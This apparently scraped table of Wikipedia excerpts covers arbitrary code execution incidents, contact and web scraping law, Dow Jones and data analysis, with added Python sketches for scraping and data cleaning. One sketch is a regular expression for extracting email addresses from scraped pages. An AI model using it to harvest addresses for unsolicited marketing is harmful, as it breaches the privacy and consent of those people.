allowing them to write to protected memory. 
At Awesome Games Done Quick 2014, a group of speedrunning enthusiasts managed to code and run versions of the games Pong and Snake in a copy of Super Mario World 12 by utilizing an out-of-bounds read of a function pointer that points to a user controlled buffer to execute arbitrary code. On June 12, 2018, Bosnian security researcher Jean-Yves Avenard of Mozilla discovered an ACE vulnerability in Windows 10. 13 On May 1, 2018, a security researcher discovered an ACE vulnerability in the 7 Zip file archiver. 14 PHP has been the subject of numerous ACE vulnerabilities. 15 16 17 On December 9, 2021, a RCE vulnerability called "Log4Shell" was discovered in popular logging framework Log4j, affecting many services including iCloud, Minecraft: Java Edition and Steam, and characterized as "the single biggest, most critical vulnerability of the last decade". 18 19 |
78 | https://en.wikipedia.org/wiki/Data_scraping | https://ml.wikipedia.org/wiki/%E0%B4%A1%E0%B4%BE%E0%B4%B1%E0%B5%8D%E0%B4%B1_%E0%B4%B8%E0%B5%8D%E0%B4%95%E0%B5%8D%E0%B4%B0%E0%B4%BE%E0%B4%AA%E0%B5%8D%E0%B4%AA%E0%B4%BF%E0%B4%82%E0%B4%97%E0%B5%8D | (Malayalam edition of the Data scraping article: the Latin-only character filter stripped every non-Latin character, leaving only stray punctuation and digits, so no readable text survived for this row.) |
80 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Contact_scraping | In online advertising, contact scraping is the practice of obtaining access to a customer's e-mail account in order to retrieve contact information that is then used for marketing purposes. The New York Times refers to the practices of Tagged, MyLife and desktopdating.net as "contact scraping". 1 Several commercial packages are available that implement contact scraping for their customers, including ViralInviter, TrafficXplode, and TheTsunamiEffect. 2 Contact scraping is one of the applications of web scraping, and the example of email scraping tools include Uipath, Import.io, and Screen Scraper. The alternative web scraping tools include UzunExt, R functions, and Python Beautiful Soup. The legal issues of contact scraping is under the legality of web scraping. Following web scraping tools can be used as alternatives for contact scraping: In the United States, there exists three most commonly legal claims related to web scraping: compilation copyright infringement, violation of the Computer Fraud and Abuse Act (CFAA), and electronic trespass to chattel claims. For example, the users of "scraping tools" may violate the electronic trespass to chattel claims. 6 One of the well-known cases is Intel Corp. v. Hamidi, in which the US court decided that the computer context was not included in the common law trespass claims. 7 8 However, the three legal claims have been changed doctrinally, and it is uncertain whether the claims will still exist in the future. 6 9 For instance, the applicability of the CFAA has been narrowed due to the technical similarities between web scraping and web browsing. 10 In the case of EF Cultural Travel BV v. Zefer Corp., the court declined to apply CFAA since EF failed to meet the standard for "damage". 11 By the Article 14 of the EU's General Data Protection Regulation (GDPR), data controllers are obligated to inform individuals before processing personal data. 12 In the case of Bisnode vs. Polish Supervisory Authority, Bisnode obtained personal data from the government public register of business activity, and the data were used for business purpose. However, Bisnode only obtained email addresses for some of the people, so the mail notifications were only sent to those individuals. Instead of directly informing other people, Bisnode simply posted a notice on its website, and thus it failed to comply with the GDPR's Article 14 obligations. 13 14 In Australia, address harvesting software and harvested address lists must not be supplied, acquired, or used under the Spam Act 2003. The Spam Act also requires all marketing emails to be sent with the consent of the recipients, and all emails must include an opt-out facility. 15 The company behind the GraysOnline shopping websites was fined after sending emails that breached the Spam Act. GraysOnline sent messages without an option for recipients to opt-out of receiving further emails, and it sent emails to people who had previously withdrawn their consent from receiving Grays' emails. 16 17 Under the Cybersecurity Law of the People's Republic of China, web crawling of publicly available information is regarded as legal, but it would be illegal to obtain nonpublic, sensitive personal information without consent. 18 On November 24, 2017, three people were convicted of the crime of illegally scraping information system data stored on the server of Beijing ByteDance Networking Technology Co., Ltd. 19 |
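The entry above treats email harvesting mostly as a legal question, but the mechanical part is a single regular expression applied to text that has already been scraped. Below is a purely illustrative sketch: the pattern is a rough approximation rather than a full RFC 5322 validator, and any real use is subject to the consent and opt-out obligations (GDPR Article 14, the Spam Act 2003) that the entry describes.
# Illustrative only: find email-like strings in text that has already been scraped.
import re

EMAIL_PATTERN = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def extract_emails(text):
    # Return the unique email-like matches, sorted for stable output.
    return sorted(set(EMAIL_PATTERN.findall(text)))

# Example with made-up input:
# extract_emails("Contact sales@example.com or support@example.org for details.")
# -> ['sales@example.com', 'support@example.org']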
81 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dow_Jones_%26_Company | Dow Jones Company, Inc. (also known simply as Dow Jones) is an American publishing firm owned by News Corp and led by CEO Almar Latour. 4 The company publishes The Wall Street Journal, Barron's, MarketWatch, Mansion Global, Financial News and Private Equity News. It published the Dow Jones Industrial Average (DJIA) from 1882 until 2010, when News Corp then sold 90% ownership of the Dow Jones stock market indices business to CME Group; News Corp sold CME its remaining 10% in 2013. The company was founded in 1882 by three reporters: Charles Dow, Edward Jones, and Charles Bergstresser. Charles Dow was widely known for his ability to break down and convey what was often considered very convoluted financial information and news to the general public this is one of the reasons why Dow Jones Company is well known for their publications and transferring of important and sometimes difficult to understand financial information to people across the globe. Nevertheless, the three reporters were joined in control of the organization by Thomas F. Woodlock. 5 Dow Jones was acquired in 1902 by Clarence Barron, the leading financial journalist of the day, after the death of co-founder Charles Dow. 6 Upon Barron's death in 1928, control of the company passed to his stepdaughters Jane and Martha Bancroft. The company was led by the Bancroft family, which effectively controlled 64% of all voting stock, until 2007 when an extended takeover battle saw News Corporation acquire the business. The company then became a subsidiary of News Corporation. 7 It was reported on August 1, 2007, that the bid had been successful after an extended period of uncertainty about shareholder agreement, with the transaction finalized on December 13, 2007. 8 9 10 It was worth US$5 billion or $60 a share, giving News Corp control of The Wall Street Journal and ending the Bancroft family's 105 years of ownership. 11 The company was best known for the publication of the Dow Jones Industrial Average and related market statistics, Dow Jones Newswire, and a number of financial publications. In 2010 the Dow Jones Indexes subsidiary was sold to the CME Group and the company focused on financial news publications, including its flagship publication The Wall Street Journal and providing financial news and information tools to financial companies. 12 In 2005, together with FTSE, Dow Jones launched the Industry Classification Benchmark, a taxonomy used to segregate markets into sectors. In April 2020, Dow Jones CEO William Lewis announced he would be stepping down from his position after nearly six years in the role. 13 On May 7, 2020 News Corp announced that Almar Latour would assume the CEO role on May 15, 2020. 14 In 2021, Dow Jones acquired OPIS and Base Chemicals from IHS Market for $1.4 billion dollars. 15 16 Its flagship publication, The Wall Street Journal, is a daily newspaper in print and online covering business, financial national and international news and issues around the globe. It began publishing on July 8, 1889. There are 12 versions of the Journal in nine languages, including English, Chinese, Japanese, German, Spanish, Portuguese, Malay, Turkish and Korean. The Journal has won 35 Pulitzer Prizes for outstanding journalism. 
17 Other consumer-oriented publications of Dow Jones include Barron's Magazine, a weekly overview of the world economy and markets, MarketWatch, an online financial news site, and Investor's Business Daily, a newspaper and website covering the stock market, international business, finance and economics. Financial News 18 provides news on investment banking, securities, and asset management. BigCharts, 19 provided by MarketWatch's Virtual Stock Exchange Games, 20 includes stock charts, screeners, interactive charting, and research tools. Professor Journal 21 is a "Journal" in education program for professors to integrate into curriculum. In 2017, Dow Jones launched Moneyish, a lifestyle and personal finance website aimed at millennial readers. 22 Dow Jones also published Heat Street, an online news and opinion website launched in February 2016 that was later folded into MarketWatch. 23 The monthly journal Far Eastern Economic Review closed in September 2009. Dow Jones serves corporate markets and financial markets clients with financial news and information products and services. Dow Jones owns more than 20 products that combine content and technology to help drive decisions, which include: Dow Jones Newswires is the real-time financial news organization founded in 1882, its primary competitors are Bloomberg L.P. and Thomson Reuters. The company reports more than 600,000 subscribers including brokers, traders, analysts, world leaders, and finance officials and fund managers as of July 2011. In 2009 Dow Jones Ventures launched FINS.com, a standalone resource for financial professionals with information about finance careers and the finance industry. In 2012, the site was acquired by Dice.com. In broadcasting, Dow Jones provides news content to CNBC in the U.S. It produced two shows for commercial radio, The Wall Street Journal Report on the Wall Street Journal Radio Network and The Dow Jones Report. The network was shut down in 2014. Dow Jones also launched WSJ Live 29 an interactive video website that provides live and on demand videos from The Wall Street Journal Video Network. Programs included "News Hub", "MoneyBeat", and "Lunch Break" among others. WSJ Live was shut down in 2017. In February 2010, Dow Jones sold a 90% stake in its Index business for $607.5 million to Chicago-based CME Group, which owns the Chicago Mercantile Exchange. 30 A few of the most widely used included: In July 2012, Dow Jones Company and CME Group contributed the Dow Jones Indices to the formation of the S P Dow Jones Indices joint venture, with McGraw Hill's Standard and Poor's (S P) subsidiary holding 73.0%, the CME Group holding 24.4%, and Dow Jones Company holding an indirect 2.6% ownership interest in the joint venture. 31 In April 2013, CME Group purchased the Dow Jones Company interest in the S P Dow Jones Indices joint venture for $80.0 million, increasing CME Group's interest to 27.0% and removing Dow Jones Company from all involvement with its namesake indices. 32 In March 2017, Dow Jones and NewsPicks Inc., a Japanese firm that develops and operates a business news platform of the same name, established a joint venture called NewsPicks USA, LLC. 33 The joint venture is headed by CEO Ken Breen, who is currently the Senior Vice President, Commercial, for the Dow Jones Media Group, together with Chairman Yusuke Umeda, who is also the Director of NewsPicks Inc. 34 33 35 The joint venture launched the English version of the NewsPicks platform for the US market on November 13, 2017. 
Similar to the original Japanese edition, the US edition of NewsPicks combines business news from sources like The Wall Street Journal, Bloomberg, and Reuters with social networking features, such as comments on news articles from top-ranked business professionals from around the world ("ProPickers"). 36 The platform currently has a smartphone app for the iPhone with plans for release on Android in the future. 37 The venture was dissolved in October 2018 with the Japanese parent company retaining full ownership. 38 The company's foundation was laid by Charles Dow, Edward Jones and Charles Bergstresser who, over two decades, conceived and promoted the three products which define Dow Jones and financial journalism: The Wall Street Journal, Dow Jones Newswires and the Dow Jones Industrial Average. 6 Dow Jones was acquired in 1902 by the leading financial journalist of the day, Clarence Barron. 6 In 2007, Dow Jones was acquired by News Corp., a leading global media company. 6 The Bancroft family and heirs of Clarence W. Barron effectively controlled the company's class B shares, each with a voting power of ten regular shares, prior to its sale to News Corp. At one time, they controlled 64% of Dow Jones voting stock. 39 Currently, Dow Jones is owned by Rupert Murdoch, owner of News Corp and several other major media companies. On May 1, 2007, Dow Jones released a statement confirming that News Corporation, led by Rupert Murdoch, had made an unsolicited offer of $60 per share, or $5 billion, for Dow Jones. 40 Stock was briefly halted for a pending press release. The halt lasted under 10 minutes while CNBC was receiving data. It was suggested that the buyout offer was related to Murdoch's new cable business news channel Fox Business, which launched in 2007, and that the Dow Jones brand would bring instant credibility to the project. 41 On June 6, 2007, Brian Tierney, CEO and founder of Philadelphia Media Holdings, which then owned The Philadelphia Inquirer, Philadelphia Daily News and Philly.com, went public in an article on Philly.com expressing interest in "joining with outside partners to buy Dow Jones. Tierney said, "We would participate as Philadelphia Media Holdings, along with other investors. We wouldn't do it alone. 42 In June, MySpace co-founder Brad Greenspan put forth a bid to buy 25% of Dow Jones for $60 a share, the same price per share as News Corporation's bid, giving the existing shareholders a $1.25 billion cash infusion while maintaining overall ownership of the company. 43 On July 17, 2007, The Wall Street Journal, a unit of Dow Jones, reported that the company and News Corporation had agreed in principle on a US$5 billion takeover, that the offer would be put to the full Dow Jones board on the same evening in New York, and that the offer valued the company at 70% more than the company's market value. 44 Our strategy centers around leaving the print publications of Dow Jones intact to continue serving as the gold standard of financial reporting, and creating additional earnings streams through digital media initiatives that can produce a stock price above 100 dollars a share, For too long, Dow Jones has limited its focus to the world of print media and allowed other, less established entities to generate millions of dollars in profits by developing financial reporting franchises on the Internet and cable television. The time has come for Dow Jones to break out of its slumber and extend its dominance into the lucrative arena of digital media. 
Upon investigating suspicious share price movements in the run-up to the announcement, the United States Securities and Exchange Commission alleged that board member Sir David Li, one of Hong Kong's most prominent businessmen, had informed his close friend and business associate Michael Leung of the impending offer. Leung acted on this information by telling his daughter and son-in-law, who reaped a US$8.2 million profit from an insider trading transaction. 46 Prior to its sale to News Corp, the last members of the board of directors of the company were Christopher Bancroft, Lewis B. Campbell, Michael Elefante, John Engler, Harvey Golub, Leslie Hill, Irvine Hockaday, Peter Kann, David Li, M. Peter McPherson (chairman), Frank Newman, James Ottaway, Elizabeth Steele, and William Steere. citation needed |
82 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Vertical_aggregation | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
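As a hedged illustration of the two approaches above, the sketch below combines a "grep"-style regular-expression pass over the raw markup with an XPath query on the parsed DOM. The lxml library is an assumption here (it is not installed in the cells above), and the patterns are illustrative only.
# Text-pattern matching versus DOM parsing, side by side.
import re
import requests
from lxml import html  # assumed extra dependency: pip install lxml

page = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10).text

# "grep"-style: pull four-digit years straight out of the raw HTML
years = re.findall(r"\b(?:19|20)\d{2}\b", page)

# DOM-style: build a tree and query it with XPath
tree = html.fromstring(page)
first_paragraph = tree.xpath("//p")[0].text_content()
print(len(years), first_paragraph[:80])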
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
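For comparison with the library-level approach above, a framework such as Scrapy organizes the crawl loop for you. The skeleton below is a hedged sketch (Scrapy is not installed in the cells above), and the site and selectors come from Scrapy's own tutorial, not from this document's data.
import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        # yield one structured item per quote block on the page
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # follow pagination; the framework schedules and de-duplicates requests
        next_page = response.css("li.next a::attr(href)").get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)
Such a spider would typically be run with scrapy runspider, which handles throttling, retries, and output feeds that the plain requests approach leaves to the programmer.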
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, at times up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
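Since the scraped list of counter-measures is cut off above, the sketch below shows the complementary, scraper-side etiquette those measures are meant to enforce: honoring robots.txt, identifying the client, and rate-limiting requests. The User-Agent string and delay are illustrative assumptions.
import time
import requests
from urllib.robotparser import RobotFileParser

BASE = "https://en.wikipedia.org"
robots = RobotFileParser(BASE + "/robots.txt")
robots.read()

HEADERS = {"User-Agent": "example-research-bot/0.1 (contact: you@example.com)"}  # hypothetical identifier

def polite_get(path, delay=2.0):
    url = BASE + path
    if not robots.can_fetch(HEADERS["User-Agent"], url):
        raise PermissionError(f"robots.txt disallows {url}")
    time.sleep(delay)                              # crude rate limiting between requests
    return requests.get(url, headers=HEADERS, timeout=10)

print(polite_get("/wiki/Web_scraping").status_code)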
83 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_analysis | Data analysis is the process of inspecting, cleansing, transforming, and modeling data with the goal of discovering useful information, informing conclusions, and supporting decision-making. 1 Data analysis has multiple facets and approaches, encompassing diverse techniques under a variety of names, and is used in different business, science, and social science domains. 2 In today's business world, data analysis plays a role in making decisions more scientific and helping businesses operate more effectively. 3 Data mining is a particular data analysis technique that focuses on statistical modeling and knowledge discovery for predictive rather than purely descriptive purposes, while business intelligence covers data analysis that relies heavily on aggregation, focusing mainly on business information. 4 In statistical applications, data analysis can be divided into descriptive statistics, exploratory data analysis (EDA), and confirmatory data analysis (CDA). 5 EDA focuses on discovering new features in the data while CDA focuses on confirming or falsifying existing hypotheses. 6 7 Predictive analytics focuses on the application of statistical models for predictive forecasting or classification, while text analytics applies statistical, linguistic, and structural techniques to extract and classify information from textual sources, a species of unstructured data. All of the above are varieties of data analysis. 8 Data integration is a precursor to data analysis, and data analysis is closely linked to data visualization and data dissemination. 9 Analysis refers to dividing a whole into its separate components for individual examination. 10 Data analysis is a process for obtaining raw data, and subsequently converting it into information useful for decision-making by users. 1 Data is collected and analyzed to answer questions, test hypotheses, or disprove theories. 11 Statistician John Tukey, defined data analysis in 1961, as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data. 12 There are several phases that can be distinguished, described below. The phases are iterative, in that feedback from later phases may result in additional work in earlier phases. 13 The CRISP framework, used in data mining, has similar steps. The data is necessary as inputs to the analysis, which is specified based upon the requirements of those directing the analytics (or customers, who will use the finished product of the analysis). 14 15 The general type of entity upon which the data will be collected is referred to as an experimental unit (e.g., a person or population of people). Specific variables regarding a population (e.g., age and income) may be specified and obtained. Data may be numerical or categorical (i.e., a text label for numbers). 13 Data is collected from a variety of sources. 16 17 A list of data sources are available for study research. The requirements may be communicated by analysts to custodians of the data; such as, Information Technology personnel within an organization. 
18 Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. The data may also be collected from sensors in the environment, including traffic cameras, satellites, recording devices, etc. It may also be obtained through interviews, downloads from online sources, or reading documentation. 13 Data, when initially obtained, must be processed or organized for analysis. 19 20 For instance, these may involve placing data into rows and columns in a table format (known as structured data) for further analysis, often through the use of spreadsheet or statistical software. 13 Once processed and organized, the data may be incomplete, contain duplicates, or contain errors. 21 22 The need for data cleaning will arise from problems in the way that the datum are entered and stored. 21 Data cleaning is the process of preventing and correcting these errors. Common tasks include record matching, identifying inaccuracy of data, overall quality of existing data, deduplication, and column segmentation. 23 Such data problems can also be identified through a variety of analytical techniques. For example; with financial information, the totals for particular variables may be compared against separately published numbers that are believed to be reliable. 24 25 Unusual amounts, above or below predetermined thresholds, may also be reviewed. There are several types of data cleaning, that are dependent upon the type of data in the set; this could be phone numbers, email addresses, employers, or other values. 26 27 Quantitative data methods for outlier detection, can be used to get rid of data that appears to have a higher likelihood of being input incorrectly. 28 Textual data spell checkers can be used to lessen the amount of mistyped words. However, it is harder to tell if the words themselves are correct. 29 Once the datasets are cleaned, they can then be analyzed. Analysts may apply a variety of techniques, referred to as exploratory data analysis, to begin understanding the messages contained within the obtained data. 30 The process of data exploration may result in additional data cleaning or additional requests for data; thus, the initialization of the iterative phases mentioned in the lead paragraph of this section. 31 Descriptive statistics, such as, the average or median, can be generated to aid in understanding the data. 32 33 Data visualization is also a technique used, in which the analyst is able to examine the data in a graphical format in order to obtain additional insights, regarding the messages within the data. 13 Mathematical formulas or models (also known as algorithms), may be applied to the data in order to identify relationships among the variables; for example, using correlation or causation. 34 35 In general terms, models may be developed to evaluate a specific variable based on other variable(s) contained within the dataset, with some residual error depending on the implemented model's accuracy (e.g., Data Model Error). 36 11 Inferential statistics includes utilizing techniques that measure the relationships between particular variables. 37 For example, regression analysis may be used to model whether a change in advertising (independent variable X), provides an explanation for the variation in sales (dependent variable Y). 38 In mathematical terms, Y (sales) is a function of X (advertising). 
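Before continuing with the regression model, here is a small pandas sketch of the cleaning steps just described: deduplication and quantitative outlier detection. The column names and values are hypothetical.
import pandas as pd

records = pd.DataFrame({
    "email":  ["a@x.com", "a@x.com", "b@x.com", "c@x.com"],
    "amount": [10.0, 10.0, 12.5, 9999.0],   # the last value looks mistyped
})

records = records.drop_duplicates()                    # record matching / deduplication

q1, q3 = records["amount"].quantile([0.25, 0.75])      # IQR rule for outlier detection
iqr = q3 - q1
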